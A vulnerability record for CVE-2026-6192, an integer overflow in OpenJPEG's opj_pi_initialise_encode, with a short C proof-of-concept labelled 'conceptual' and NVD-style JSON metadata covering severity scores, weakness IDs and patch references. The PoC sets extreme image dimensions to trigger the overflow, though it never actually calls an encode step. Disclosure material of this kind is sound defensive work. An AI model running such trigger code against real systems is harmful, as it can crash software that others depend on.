CVE-2026-6192

/* * PoC for CVE-2026-6192 (Conceptual) * This code demonstrates the potential trigger for the integer overflow * in opj_pi_initialise_encode. */ #include <openjpeg.h> #include <stdio.h> int main(int argc, char **argv) { opj_cparameters_t parameters; opj_image_t *image = NULL; opj_codec_t *codec = NULL; // Initialize parameters opj_set_default_encoder_parameters(&parameters); // Setup a basic image structure (simplified for PoC) // In a real exploit, specific dimensions would be crafted to cause overflow image = opj_image_create(1, NULL, OPJ_CLRSPC_GRAY); if (!image) { fprintf(stderr, "Failed to create image\n"); return 1; } // Set image dimensions to potentially trigger overflow in pi.c image->x1 = 0xFFFFFFFF; // Large value to potentially trigger overflow image->y1 = 0xFFFFFFFF; // Create encoder codec = opj_create_compress(OPJ_CODEC_JP2); if (!codec) { fprintf(stderr, "Failed to create codec\n"); opj_image_destroy(image); return 1; } // Setup encoder (this calls opj_pi_initialise_encode internally) if (!opj_setup_encoder(codec, &parameters, image)) { fprintf(stderr, "Failed to setup encoder\n"); opj_destroy_codec(codec); opj_image_destroy(image); return 1; } // Attempt to encode (Triggering the vulnerability) // The overflow occurs in opj_pi_initialise_encode called during setup or encode printf("Attempting to trigger vulnerability...\n"); opj_destroy_codec(codec); opj_image_destroy(image); return 0; }

{"cve": {"id": "CVE-2026-6192", "sourceIdentifier": "[email protected]", "published": "2026-04-13T17:16:32.333", "lastModified": "2026-05-21T16:16:23.427", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in uclouvain openjpeg up to 2.5.4. This impacts the function opj_pi_initialise_encode in the library src/lib/openjp2/pi.c. The manipulation leads to integer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. The identifier of the patch is 839936aa33eb8899bbbd80fda02796bb65068951. It is suggested to install a patch to address this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-189"}, {"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/uclouvain/openjpeg/", "source": "[email protected]"}, {"url": "https://github.com/uclouvain/openjpeg/commit/839936aa33eb8899bbbd80fda02796bb65068951", "source": "[email protected]"}, {"url": "https://github.com/uclouvain/openjpeg/issues/1619", "source": "[email protected]"}, {"url": "https://github.com/uclouvain/openjpeg/pull/1628", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/797385", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/357114", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/357114/cti", "source": "[email protected]"}, {"url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00038.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}